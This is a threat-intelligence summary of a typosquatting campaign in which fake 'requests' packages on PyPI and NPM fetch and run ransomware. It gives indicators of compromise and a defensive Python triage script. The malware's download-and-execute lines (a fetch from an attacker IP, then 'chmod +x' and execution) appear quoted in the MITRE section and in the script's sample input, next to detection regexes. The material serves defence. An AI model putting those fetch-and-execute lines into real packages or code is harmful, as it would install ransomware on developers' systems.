Phylum Detects Ongoing Typosquat/Ransomware Campaign in PyPI and NPM

Phylum reports an ongoing typosquatting campaign targeting Python and JavaScript developers on PyPI and NPM, delivering a ransomware payload when executed. The attacker publishes typosquatted packages (notably around the Python requests package) that fetch a list of remote binaries and attempt to encrypt files on affected systems. #PyPI #NPM

Keypoints

  • Typosquatted PyPI/NPM packages mimic legitimate software (e.g., the Python requests package) to deliver malicious payloads.
  • The malicious packages fetch a list of available binaries from a remote host (http://35.235.126.33/all.txt) to determine which payload to download.
  • Depending on the victim OS, one of many Golang binaries (cia.*) is downloaded and executed, with architecture-specific variants for Linux, Windows, and macOS.
  • The malware uses OS commands (chmod and execution) to run the downloaded binaries, with Windows using a start command to launch payloads.
  • The ransomware component will update the desktop background and attempt to encrypt files, with a README showing a $100 ransom demand in multiple currencies.
  • VirusTotal marks the binaries as malware and lists multiple SHA-1 hashes for the payloads.
  • The campaign also expanded to NPM with JavaScript equivalents of the Python payload, and the attacker continued updates through Dec 13, 2022, pulling second-stage payloads from another host (34.94.72.179) and releasing new builds.
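The two behaviours summarised above, a dependency name one or two keystrokes away from `requests` and package code that fetches from a bare-IP HTTP URL and hands the result to `os.system()`, can both be caught by a small pre-install triage check. The script below is an added example written for this summary, not code from Phylum or from the campaign; the host addresses are copied from the Indicators of Compromise on this page, the sample dependency list and sample package source are constructed here to exercise the checks, and the names `suspicious_dependency`, `scan_source` and `triage_requirements` are this example's own.

```python
"""Pre-install triage modelled on the typosquat campaign described above.

Check 1: dependency names within a small edit distance of a protected package.
Check 2: package source that reaches a bare-IP HTTP URL and runs a downloaded
         file through os.system() with chmod/./ (Linux, macOS) or start (Windows).
"""
import re

# Hosts taken from this page's Indicators of Compromise.
KNOWN_BAD_HOSTS = {"35.235.126.33", "34.94.72.179"}

# Names to protect. Only 'requests' is named on the page; extend with your own list.
PROTECTED_PACKAGES = {"requests"}


def damerau_levenshtein(a, b):
    """Optimal string alignment distance: edits plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def normalize(name):
    """PEP 503 name normalisation: lower-case, runs of -_. become a single '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def suspicious_dependency(name, protected=PROTECTED_PACKAGES, max_distance=2):
    """Return the protected package this name resembles, or None if it is exact or unrelated."""
    n = normalize(name)
    good_names = {normalize(g): g for g in protected}
    if n in good_names:
        return None  # the genuine package
    for g_norm, g in good_names.items():
        if damerau_levenshtein(n, g_norm) <= max_distance:
            return g
    return None


def triage_requirements(names):
    """Map each suspicious dependency to the package it imitates."""
    return {n: hit for n in names if (hit := suspicious_dependency(n))}


# http(s) URL whose host is a literal IPv4 address (no DNS name to attribute).
IP_URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/\S*")
# os.system(...) whose command starts with chmod +x, ./ or start, as quoted on this page.
OS_SYSTEM_RE = re.compile(r"os\.system\(\s*f?['\"]\s*(chmod\s+\+x|\./|start\s)")


def scan_source(source):
    """Return (line_no, tag, detail) findings for fetch-and-execute patterns."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in IP_URL_RE.finditer(line):
            host = m.group(1)
            tag = "known-bad host" if host in KNOWN_BAD_HOSTS else "bare-IP URL"
            findings.append((lineno, tag, host))
        if OS_SYSTEM_RE.search(line):
            findings.append((lineno, "os.system exec pattern", line.strip()))
    return findings


# Constructed sample input: a dependency list with two near-misses of 'requests'.
SAMPLE_REQUIREMENTS = ["requests", "requestss", "reqeusts", "numpy"]

# Constructed sample input mirroring the behaviour the page describes (URL and
# os.system lines as quoted there); it is never executed, only scanned as text.
SAMPLE_SETUP = "\n".join([
    "import os, urllib.request",
    'listing = urllib.request.urlopen("http://35.235.126.33/all.txt").read()',
    'executable = "cia.linux.amd64"',
    "os.system(f'chmod +x {executable}')",
    "os.system(f'./{executable} &')",
])

if __name__ == "__main__":
    for bad, looks_like in triage_requirements(SAMPLE_REQUIREMENTS).items():
        print(f"typosquat candidate: {bad!r} resembles {looks_like!r}")
    for lineno, tag, detail in scan_source(SAMPLE_SETUP):
        print(f"line {lineno}: {tag}: {detail}")
```

The distance threshold of 2 is deliberately loose for a package as popular as `requests`; for a longer allow-list, lower it to 1 or weight it by name length, otherwise short legitimate names will collide. The source scan is a triage signal, not proof of malice: a bare-IP download plus `chmod +x` and execution in `setup.py` is what the page quotes, and a hit should block the install for manual review rather than be treated as a verdict.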

MITRE Techniques

  • [T1195] Supply Chain – Typosquatting PyPI/NPM packages to deliver payloads. "Overnight we saw a flurry of activity around typosquats of the popular Python requests package."
  • [T1105] Ingress Tool Transfer – Downloading payloads from a remote host after an initial fetch. "The initial request reaches out to the following host to fetch a list of available binaries."
  • [T1059] Command and Scripting Interpreter – Executing downloaded binaries via OS commands (Linux/macOS chmod and execution, Windows start). `os.system(f'chmod +x {executable}')` and `os.system(f'./{executable} &')`
  • [T1486] Data Encrypted for Impact – The ransomware encrypts files on the victim machine and shows a ransom note. "This binary is ransomware. If you execute it on a machine it will update your desktop background and attempt to encrypt some of your files."
  • [T1071.001] Web Protocols – C2/payload delivery and second-stage fetch occur over HTTP. "The initial request reaches out to the following host to fetch a list of available binaries."

Indicators of Compromise

  • [IP] – 35.235.126.33 (initial payload fetch host) and 34.94.72.179 (second-stage host)
  • [URL] – http://35.235.126.33/all.txt (initial list of binaries to download)
  • [SHA1] – 4e5455caf9e5499e82b8ae6ecfdb69556dd780d8 – Linux PPC64LE binary (and 2 more hashes)
  • [SHA1] – 85b35a6b5901283d7f4b52061ff51664f3577aef – Windows ARM executable (and 2 more hashes)
  • [File Name] – cia.linux.amd64, cia.windows.amd64.exe (and 2 more file names)

Read more: https://blog.phylum.io/phylum-detects-active-typosquatting-campaign-in-pypi